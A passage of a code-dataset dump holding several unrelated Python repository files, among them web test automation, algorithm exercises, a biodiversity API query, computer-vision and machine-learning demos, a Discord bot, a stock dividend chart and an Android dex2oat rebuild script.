self.bucket, object_id)\n","repo_name":"enchantner/pipereport","sub_path":"pipereport/sink/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37722790950","text":"'''\n商品浏览\n'''\n\nfrom common.base import Base\nfrom time import sleep\nurl = \"http://ecshop.itsoso.cn/\"\n\nclass Goodslist_Page(Base):\n \"\"\"封装表现层:制作定位器\"\"\"\n # 首页元素的定位\n first_page_loc = (\"link text\", \"首页\")\n send_loc = (\"name\", \"keywords\")\n search_loc = (\"value\", \"搜索\")\n\n\n def click_first(self):\n \"\"\"点击首页\"\"\"\n self.click(self.first_page_loc)\n\n def get_goods_text(self, locator):\n \"\"\"获取商品文本\"\"\"\n goods_elements = self.find_elements(locator)\n texts = []\n for goods_element in goods_elements:\n text = goods_element.text # 获取单个商品的文本\n texts.append(text)\n return texts\n\n def click_texts(self, locator1,locator2):\n \"\"\"\n\n :param locator1: 商品类的元素定位器\n :param locator2: 商品���表的定位器\n :return:\n \"\"\"\n # 取出商品类的所有文本\n texts = self.get_goods_text(locator1)\n for text in texts:\n good_loc = (\"link text\", text)\n self.click(good_loc)\n self.click_all_element(locator2)\n\n def get_goods_title(self, locator):\n \"\"\"获取商品标题\"\"\"\n goods_elements = self.find_elements(locator)\n # 获取商品标题\n titles = [] # 准备一个列表装商品标题\n for goods_element in goods_elements:\n # title就是表示元素的属性值\n title = goods_element.get_attribute(\"title\")\n titles.append(title)\n return titles\n\n def click_all_element(self, locator):\n \"\"\"点击所有元素\"\"\"\n titles = self.get_goods_title(locator)\n for title in titles:\n # 重新制作单个商品的定位器\n goods_loc = (\"css selector\", f\"a[title='{title}']\")\n self.click(goods_loc)\n self.back()\n self.next_page()\n\n def next_page(self):\n # 下一页的定位器\n next_loc = (\"link text\", \"下一页\")\n # 点击下一页\n # 判断有没有下一页的元素,有就点击元素,没有就返回首页\n while True:\n if self.displayed(next_loc):\n self.click(next_loc)\n else:\n self.click(self.first_page_loc)\n break\n\n\n def input_goods(self,text):\n \"\"\"输入搜索商品名\"\"\"\n self.send_keys(self.send_loc,text)\n\n def click_search(self):\n \"\"\"点击搜索按钮\"\"\"\n self.click(self.search_loc)\n\nif __name__ == '__main__':\n from common.base import open_browser\n\n driver = open_browser()\n goods = Goodslist_Page(driver) # 实例化login page\n goods.open_url(url) # 打开网址\n goods.click_first() # 点击首页\n categary_loc = (\"css selector\", \"div.cat-box>div.cat1>a\") # 商品类的定位器\n goods_loc = (\"css selector\", \"div.goods-title>a\") # 商品列表的定位器\n goods.click_texts(categary_loc, goods_loc) # 点击商品类\n","repo_name":"15008477526/-","sub_path":"web_aaaaaaaa/page/goods_list_page.py","file_name":"goods_list_page.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28923311211","text":"#1194. 달이 차오른다, 가자!\n\"\"\"\nBitmasking + BFS Technique \n\n상태공간의 정의 \n\ndists[i][j][key] = (i,j)인데 현재 status가 key인 것.\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline \nfrom collections import deque \n\nN,M = map(int, input().rstrip().split())\n\nboards = []\nstart = (-1,-1)\nends = []\n\ndists = [[[-1] * M for _ in range(N)] for _ in range(64)]\n\nfor row in range(N):\n each_row = list(input().rstrip())\n boards.append(each_row)\n for col in range(M):\n if each_row[col] == \"0\" : \n start = (row,col)\n elif each_row[col] == \"1\" :\n ends.append((row,col))\n\n \n \n#방문 로직은 bfs 함수에서 검증하자!\n\"\"\"\n2500 * 64\n\n\n- RangeOut / Visit 여부 확인\n\n- Key가 있을 때 방문가능 여부 확인! (status check)\n\n\"\"\"\n\ns_row, s_col = start\n\ndists[0][s_row][s_col] = 0\ndeq = deque([(0,s_row,s_col)])\n\ndx = [-1,1,0,0]\ndy = [0,0,1,-1]\n\n\n\n\ndef bfs(deq, dist):\n while deq:\n key, cur_x, cur_y = deq.popleft()\n # print(f\"key:{key}, cur_x:{cur_x}, cur_y:{cur_y}, distance: {dists[key][cur_x][cur_y]}\")\n for i in range(4):\n nx = cur_x + dx[i] ; ny = cur_y + dy[i]\n #Rangeout, Visit, Wall 무시\n if nx<0 or ny<0 or nx>=N or ny>=M : continue \n if boards[nx][ny] == \"#\" : continue\n if dists[key][nx][ny]>=0: \n continue\n \n if boards[nx][ny].islower():\n order = ord(boards[nx][ny])-97\n new_key = (key | (1<(r:Resource), \\\n\t\t\t(t)-[:predicate]->(pred:Term) \\\n\t\tWHERE p.canonical = '\" + name + \"'\"\\\n\t\t\"OPTIONAL MATCH (t)-[:units_term]->(units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:object_term]->(obj:Term) \\\n\t\tOPTIONAL MATCH (t)-[:normal_units_term]->(normal_units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:sex_term]->(sex:Term) \\\n\t\tOPTIONAL MATCH (t)-[:lifestage_term]->(lifestage:Term) \\\n\t\tOPTIONAL MATCH (t)-[:statistical_method_term]->(stats:Term) \\\n\t\tRETURN p.canonical, pred.name, obj.name, t.literal, t.measurement, units.name, t.normal_measurement, normal_units.name, sex.name, lifestage.name, stats.name, stats.comment, r.resource_id, p.page_id, t.eol_pk, t.source \\\n\t\tLIMIT 500\"\n\ndata = {\"query\" : query,\n\t\t\"format\" : \"cypher\"}\n\n# Send api call\nr = requests.get(eol_base_url,\n\t\t\t\theaders = {\"accept\" : \"application/json\",\n\t\t\t\t\t\t\t\"authorization\" : \"JWT \" + eol_tok},\n\t\t\t\tparams = data)\n\nj = r.json()\n\n# Convert to df\ndf = pd.DataFrame(j[\"data\"])\ndf.columns = j[\"columns\"]\n\n# Drop rows where source is anage or iucn\ndf[\"t.source\"] = df[\"t.source\"].fillna(value = \"NA\")\ndf[\"Ignore_source\"] = [1 if any(s in x for s in[\"genomics.senescence\", \"iucn\"]) else 0 for x in df[\"t.source\"].tolist()]\n\ndf = df[df[\"Ignore_source\"] != 1]\n\ndf_datafields = df[\"pred.name\"].unique().tolist()\n\n# Extract relevant data\n# Habitat related data\nif \"habitat includes\" in df_datafields:\n\toutput[\"habitat\"][\"habitats\"] = df.loc[df[\"pred.name\"] == \"habitat includes\", \"obj.name\"].unique().tolist()\n\n# Pretty much countries of occurence but sum within county data too...\nif \"geographic distribution includes\" in df_datafields:\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"value\"] = df.loc[df[\"pred.name\"] == \"geographic distribution includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"unit\"] = \"Extant in country\"\n\n# Native range\nif \"native range includes\" in df_datafields:\n\toutput[\"habitat\"][\"native_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"native range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"native_range\"][\"unit\"] = \"Locations where the species is native\"\n\n# Introduced locations\nif \"introduced range includes\" in df_datafields:\n\toutput[\"habitat\"][\"introduced_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"introduced range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"introduced_range\"][\"unit\"] = \"Locations where the species has been introduced\"\n\n\nif \"body mass\" in df_datafields:\n\tif df.loc[(df[\"pred.name\"] == \"body mass\") &\n\t\t\t\t(df[\"lifestage.name\"].isnull()) &\n\t\t\t\t(df[\"stats.name\"] == \"max\"),:].shape[0] > 0:\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"t.normal_measurement\"].values[0]\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"normal_units.name\"].values[0]\n\n\nprint (json.dumps(output, indent=4, sort_keys=False))\n# May be more data, depends on species searched for...\n# Generally not much for parrots.\n\n# Not normally in reduced df\n# Population trend\n# if \"population trend\" in df_datafields:\n# \toutput[\"population\"][\"population_trend\"][\"value\"] = df.loc[df[\"pred.name\"] == \"population trend\", \"t.literal\"].values[0]\n\n# # Weights/bodymass??\n# if \"weight\" in df_datafields:\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"),:].shape[0] > 0:\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"t.normal_measurement\"].values[0]\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"normal_units.name\"].values[0]\n","repo_name":"ConMine/ConMine","sub_path":"Development/Code/eol.py","file_name":"eol.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23400386130","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nos.chdir('C:\\\\Users\\\\sachi\\\\.vscode\\\\GitHubRepos\\\\OSCV_Exercises')\nexetasknum = 1\n\nif exetasknum==1:\n img = cv2.imread('opencv-logo-white.png',0)\n img = cv2.medianBlur(img,5)\n cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,\n param1=50,param2=30,minRadius=0,maxRadius=0)\n # apparently, Param2 changes the number of circles detected\n circles = np.uint16(np.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)\n # draw the center of the circle\n cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)\n\n cv2.imshow('detected circles',cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"sachingadgil/OSCV_Exercises","sub_path":"OpenCV_Python_Tutorials/029 Hough Circle Transform.py","file_name":"029 Hough Circle Transform.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34427295995","text":"class Solution(object):\n def rearrangeBarcodes(self, barcodes):\n \"\"\"\n :type barcodes: List[int]\n :rtype: List[int]\n \"\"\"\n \n freqs = {}\n for b in barcodes:\n \tif not b in freqs:\n \t\tfreqs[b] = 0\n \tfreqs[b] += 1\n\n max_freq = 0\n for c in freqs:\n \tmax_freq = max_freq(freqs[c], max_freq)\n\n ","repo_name":"MuhammadAbuBakar95/Problem-Solving","sub_path":"two-heaps/rearrangeBarcodes.py","file_name":"rearrangeBarcodes.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"422298693","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nimport altair as alt\n\n\ndef get_data(ticker, start_date, end_date):\n ticker_data = yf.Ticker(ticker)\n df = ticker_data.history(start=start_date, end=end_date).reset_index()[\n [\"Date\", \"Close\", \"Dividends\"]]\n df[\"Close\"] = yf.download(ticker, start_date, end_date)[\"Close\"].values\n return df\n\n\ndef modify_data(initial_investment, df):\n df.loc[0, \"Shares - Not Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n df.loc[0, \"Shares - Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n\n for i in range(len(df) - 1):\n df.loc[i+1, \"Shares - Reinvested\"] = df.loc[i, \"Shares - Reinvested\"] + \\\n (df.loc[i+1, \"Dividends\"] *\n df.loc[i, \"Shares - Reinvested\"]) / df.loc[i+1, \"Close\"]\n df.loc[i+1, \"Shares - Not Reinvested\"] = df.loc[i,\n \"Shares - Not Reinvested\"]\n\n df[\"Value - Reinvested\"] = df[\"Shares - Reinvested\"] * df[\"Close\"]\n df[\"Cash Dividends\"] = (df[\"Shares - Not Reinvested\"]\n * df[\"Dividends\"]).cumsum()\n df[\"Value - Not Reinvested\"] = df[\"Shares - Not Reinvested\"] * \\\n df[\"Close\"] + df[\"Cash Dividends\"]\n\n return df\n\n\ndef get_benchmark(benchmark_ticker, start_date, end_date, initial_investment):\n df = yf.download(benchmark_ticker, start_date, end_date)[\n \"Close\"].reset_index()\n\n df[\"Shares\"] = initial_investment / df.loc[0, \"Close\"]\n df[\"Value\"] = df[\"Shares\"] * df[\"Close\"]\n\n return df\n\n\ndef get_plotting_df(benchmark_df, stock_df, benchmark_ticker):\n reinvested_df = stock_df[[\n \"Date\", \"Value - Reinvested\"]].rename(columns={\"Value - Reinvested\": \"Value\"})\n reinvested_df[\"Case\"] = \"Dividends Reinvested\"\n\n not_reinvested_df = stock_df[[\n \"Date\", \"Value - Not Reinvested\"]].rename(columns={\"Value - Not Reinvested\": \"Value\"})\n not_reinvested_df[\"Case\"] = \"Dividends Not Reinvested\"\n\n benchmark_df[\"Case\"] = benchmark_ticker\n\n plotting_df = pd.concat(\n (reinvested_df, not_reinvested_df, benchmark_df[[\"Date\", \"Value\", \"Case\"]]))\n\n return plotting_df\n\n\ndef get_chart(data):\n hover = alt.selection_single(\n fields=[\"Date\"],\n nearest=True,\n on=\"mouseover\",\n empty=\"none\",\n )\n\n lines = (\n alt.Chart(data, title=\"DRIP Return\")\n .mark_line()\n .encode(\n alt.X(\"Date\", scale=alt.Scale(\n zero=False, nice=False), title=\"Date\"),\n alt.Y(\"Value:Q\", scale=alt.Scale(zero=False)),\n color='Case',\n strokeDash='Case'\n )\n )\n\n points = lines.transform_filter(hover).mark_circle(size=65)\n\n tooltips = (\n alt.Chart(data)\n .mark_rule()\n .encode(\n x=\"Date\",\n y=\"Value:Q\",\n opacity=alt.condition(hover, alt.value(0.3), alt.value(0)),\n tooltip=[\n alt.Tooltip(\"Date\", title=\"Date\"),\n alt.Tooltip(\"Value\", title=\"Value\"),\n alt.Tooltip('Case', title=\"Case\")\n ],\n )\n .add_selection(hover)\n )\n return (lines + points + tooltips).interactive()\n\n\nif __name__ == \"__main__\":\n\n ticker = \"XYLD\"\n benchmark_ticker = \"SPY\"\n\n start_date = datetime.datetime.today() - datetime.timedelta(days=2000)\n end_date = datetime.datetime.today()\n\n df = get_data(ticker, start_date, end_date)\n df = modify_data(10000, df)\n benchmark_df = get_benchmark(benchmark_ticker, start_date, end_date, 10000)\n\n plotting_df = get_plotting_df(benchmark_df, df, benchmark_ticker)\n plotting_df[\"Value\"] = plotting_df[\"Value\"].round(decimals=2)\n\n chart = get_chart(plotting_df)\n\n print(chart)\n","repo_name":"victormorizon/financial-superapp","sub_path":"functions/drip_functions.py","file_name":"drip_functions.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15429270600","text":"# montecarlo-tf.py\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n@profile\ndef mondecarlo_pi_tf(iteration):\n trials = iteration\n hits = 0\n\n x = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n y = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n\n sess = tf.Session()\n\n with sess.as_default():\n for i in range(1,trials):\n if x.eval()**2 + y.eval()**2 < 1 :\n hits = hits + 1\n\nmondecarlo_pi_tf(10000)\n","repo_name":"mesmerli/tf-example","sub_path":"performance/montecarlo-pi/kernprof/montecarlo-tf.py","file_name":"montecarlo-tf.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"4252035394","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nclass RoleSetup(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n print(\"RoleSetup.py is ready!\")\r\n\r\n @commands.command()\r\n async def setup(self, ctx):\r\n try:\r\n embed_var = discord.Embed(title=\"CHOOSE YOUR ROLES!\", description=\r\n \"\\nReact to this message to assign yourself a role!\\n\"\r\n \"\\n⛏️ mind crafters\\n\"\r\n \"🔫 Valorant Gang\\n\"\r\n \"🐉 DnDers\\n\"\r\n \"🎮 EPIC Fortnite Gamers\\n\"\r\n \"🃏 Pokemon TCG Masters\\n\"\r\n \"🧘‍♂️ master meditators\\n\"\r\n \"💪 SHREDDED\\n\", color=discord.Color.red())\r\n\r\n await ctx.send(embed=embed_var)\r\n except Exception as e:\r\n print(\"Error:\", e)\r\n\r\nasync def setup(client):\r\n await client.add_cog(RoleSetup(client))\r\n","repo_name":"brielle5810/sk8_bot","sub_path":"RoleSetup.py","file_name":"RoleSetup.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"20061477493","text":"def ordered_ints(list_of_objects: list):\n new_list = []\n for i in list_of_objects:\n if i == ():\n new_list.append(int(len(i)))\n else:\n new_list.append(int(i))\n new_list.sort(reverse=True)\n return new_list\n\n\nprint(ordered_ints([1, True, '123', False, 6, ()]))\ndef sum_of_square(n: int):\n if n == 0:\n return 0\n else:\n return n ** 2 + sum_of_square(n - 1)\n\n\nprint(sum_of_square(10))\ndef factorial_of_squares(n: int):\n if n == 1:\n return 1\n else:\n return n ** 2 * factorial_of_squares(n - 1)\n\n\nprint(factorial_of_squares(3))\ndef process_text(text: str):\n first_text = \"\"\n # second_text = \"\"\n for i in text:\n if i == \" \":\n split_text = text.split(\" \", 1)[0]\n first_text = split_text.upper()\n second_text = text.split(\" \", 1)[1]\n\n for i in second_text:\n if (i != i.lower()) or (i == \" \") or (i == i.isnumeric()):\n second_text = second_text.replace(i, '_')\n\n return (first_text, second_text)\n\n\nprint(process_text('1234567a Text to te5t'))","repo_name":"silvisig/pep20g06","sub_path":"modul3/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21993855134","text":"import logging\n\nimport torch\nfrom torch import nn\nfrom torch.nn import Module\nfrom torchvision import models\n\n\nclass FeaturePredictorModelWrapper:\n\n def __init__(self, model_state_file: str, feature_extraction: bool):\n self.model_state_file = model_state_file\n\n self.model: Module = models.resnet50(pretrained=True)\n classifier_block_features: int = self.model.fc.in_features\n linear_out_features: int = 128\n self.feature_extraction = feature_extraction\n\n if self.feature_extraction:\n self.freeze_layers()\n else:\n logging.info(\"Fine-tuning: Skipping layer freezing\")\n\n self.model.fc = nn.Sequential(\n nn.Linear(in_features=classifier_block_features, out_features=linear_out_features),\n nn.ReLU(),\n nn.Linear(in_features=linear_out_features, out_features=2)\n )\n\n def freeze_layers(self):\n logging.info(\"Freezing base model parameters for feature extraction\")\n for name, parameter in self.model.named_parameters():\n parameter.requires_grad = False\n\n def load_model_from_file(self, device: str) -> None:\n self.model.load_state_dict(torch.load(self.model_state_file))\n self.model = self.model.to(device)\n\n logging.info(\"Model state loaded from {} to device {}\".format(self.model_state_file, device))\n\n def save_model_state(self):\n torch.save(self.model.state_dict(), self.model_state_file)\n logging.info(\"Model state saved at {}\".format(self.model_state_file))\n","repo_name":"cptanalatriste/birds-of-british-empire","sub_path":"featurepred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"24206245635","text":"import os\nimport sys\nimport subprocess\n\nTMP_FOLDER = \"/tmp/zip_dex_stuff\"\nONHOST_SYSTEM_ROOT=\"/system\"\nORG_BASE_FOLDER = \"/system\"\nDEOAT_BASE_FOLDER = \"./deoat\"\nOUT_BASE_FOLDER = \"./genoat\"\nBAKSMALI_BASE = \"java -jar ./baksmali-2.3.4.jar\"\nDEX2OAT_BASE = \"./bin/dex2oat\" # CHECK\nARCH = [\n\t# (\"arm\", \"krait\"), # Nexus 6\n\t(\"x86_64\", \"x86_64\"), # Emulator\n\t(\"x86\", \"x86\"), # Emulator\n]\nARCH_BOOT_OAT_PATH = {}\n# ARCH_BOOT_CLASS_PATH = {}\n\ndef mkdir(d):\n os.system(\"mkdir -p \" + d)\n\ndef rmall(d):\n os.system(\"rm -rf \" + d)\n\ndef listfiles(d):\n return [f for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))]\n\ndef consolidate(dex_list):\n last_dex_name = None\n curr_dex_files = {}\n all_dex_maps = {}\n # Reverse sorting makes sure that \"xxx.dex\" comes before \"xxx-classesN.dex\"\n # \"__dummy.dex\" helps populate the last mapping\n for dex in sorted(dex_list, reverse=True) + [\"__dummy.dex\"]:\n if dex[-4:] != \".dex\":\n continue\n # print(dex)\n if last_dex_name:\n if dex.startswith(last_dex_name + \"-classes\"):\n curr_dex_files[dex] = dex[dex.rfind(\"-\")+1:]\n elif last_dex_name != dex:\n all_dex_maps[last_dex_name] = curr_dex_files\n # print(last_dex_name, curr_dex_files)\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n else:\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n return all_dex_maps\n\ndef zip_dex(dex_maps, src_dir, dest_dir, suffix):\n for dex_name, dex_mapping in dex_maps.items():\n rmall(TMP_FOLDER)\n mkdir(TMP_FOLDER)\n str_dex_list = \"\"\n for org_dex_name, new_dex_name in dex_mapping.items():\n subprocess.call(\"cp %s/%s %s/%s\" % (src_dir, org_dex_name, TMP_FOLDER, new_dex_name), shell=True)\n str_dex_list += \" \" + new_dex_name\n tmp_path = TMP_FOLDER + \"/\" + dex_name + suffix\n dest_path = dest_dir + \"/\" + dex_name + suffix\n subprocess.call(\"cd \" + TMP_FOLDER + \" && zip -q \" + dex_name + suffix + str_dex_list, shell=True)\n subprocess.call(\"zipalign 4 \" + tmp_path + \" \" + dest_path, shell=True)\n rmall(TMP_FOLDER)\n\nmkdir(OUT_BASE_FOLDER)\n\n\nCOMPONENT, EXT = \"boot\", \".jar\"\nORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\nDEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\nOUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\nREMOTE_BASE_FOLDER = \"/system/framework/\"\nONHOST_BASE_FOLDER = ONHOST_SYSTEM_ROOT + \"/framework\"\n\nrmall(OUT_COMPO_FOLDER)\nmkdir(OUT_COMPO_FOLDER)\n\ndex_list = listfiles(DEOAT_COMPO_FOLDER)\ncons_dex_list = consolidate(dex_list)\nzip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\nfor (arch, arch_variant) in ARCH:\n ORG_ARCH_F = ORG_COMPO_FOLDER + \"/\" + arch + \"/boot.oat\"\n if not os.path.exists(ORG_ARCH_F):\n continue\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n ONHOST_ARCH_FOLDER = ONHOST_BASE_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n OUT_ARCH_F = OUT_ARCH_FOLDER + \"/boot.oat\"\n ONHOST_ARCH_F = ONHOST_ARCH_FOLDER + \"/boot.oat\"\n ARCH_BOOT_OAT_PATH[arch] = ONHOST_BASE_FOLDER + \"/boot.oat\"\n # ARCH_BOOT_CLASS_PATH[arch] = boot_class_path = []\n\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, ORG_ARCH_F), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n\n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx64m \"\n \"--image-classes=\" + ONHOST_SYSTEM_ROOT + \"/etc/preloaded-classes \" )\n \n for dex in clean_dex_list:\n # zip_loc = OUT_COMPO_FOLDER + \"/\" + dex\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n # boot_class_path.append(zip_loc)\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER + dex + \" \"\n \n dex2oat_cmd += ( \"--oat-symbols=\" + OUT_ARCH_F[len(OUT_COMPO_FOLDER)+1:-4] + \".sym \"\n \"--oat-file=\" + ONHOST_ARCH_F + \" \"\n \"--oat-location=\" + REMOTE_BASE_FOLDER + arch + \"/boot.oat \"\n \"--image=\" + ONHOST_ARCH_F[:-4] + \".art \"\n \"--base=0x70000000 \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info\" )\n print(dex2oat_cmd)\n os.system(\"rm \" + ONHOST_ARCH_F + \" \" + ONHOST_ARCH_F[:-4] + \".art\")\n subprocess.call(dex2oat_cmd, shell=True)\n os.system(\"cp \" + ONHOST_ARCH_F + \" \" + OUT_ARCH_F)\n os.system(\"cp \" + ONHOST_ARCH_F[:-4] + \".art\" + \" \" + OUT_ARCH_F[:-4] + \".art\")\n # sys.exit(0)\n\nraw_input(\"Press Enter to continue...\")\n\nfor COMPONENT, EXT, REPEAT_NAME in [\n (\"framework\", \".jar\", False),\n (\"app\", \".apk\", True),\n (\"priv-app\", \".apk\", True)\n ]:\n ORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\n DEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\n OUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\n REMOTE_BASE_FOLDER = \"/system/\" + COMPONENT + \"/\"\n\n rmall(OUT_COMPO_FOLDER)\n mkdir(OUT_COMPO_FOLDER)\n\n dex_list = listfiles(DEOAT_COMPO_FOLDER)\n cons_dex_list = consolidate(dex_list)\n zip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\n for (arch, arch_variant) in ARCH:\n ORG_ARCH_FOLDER = ORG_COMPO_FOLDER + \"/\" + arch\n BOOT_ART_PATH = ARCH_BOOT_OAT_PATH[arch][:-4] + \".art\"\n # str_boot_class_path = \":\".join(ARCH_BOOT_CLASS_PATH[arch])\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n\n for odex in listfiles(ORG_ARCH_FOLDER):\n if odex[-5:] != \".odex\":\n continue\n org_odex_path = ORG_ARCH_FOLDER + \"/\" + odex\n # out_odex_path = OUT_ARCH_FOLDER + \"/\" + odex\n out_odex_path = arch + \"/\" + odex\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, org_odex_path), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n \n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx512m \"\n \"--boot-image=\" + BOOT_ART_PATH + \" \" )\n \n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER\n if REPEAT_NAME:\n dex2oat_cmd += dex[:-len(EXT)] + \"/\"\n dex2oat_cmd += dex + \" \"\n\n dex2oat_cmd += ( \"--oat-file=\" + out_odex_path + \" \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info \"\n \"--abort-on-hard-verifier-error\" )\n print(dex2oat_cmd)\n subprocess.call(dex2oat_cmd, shell=True)\n # break\n # 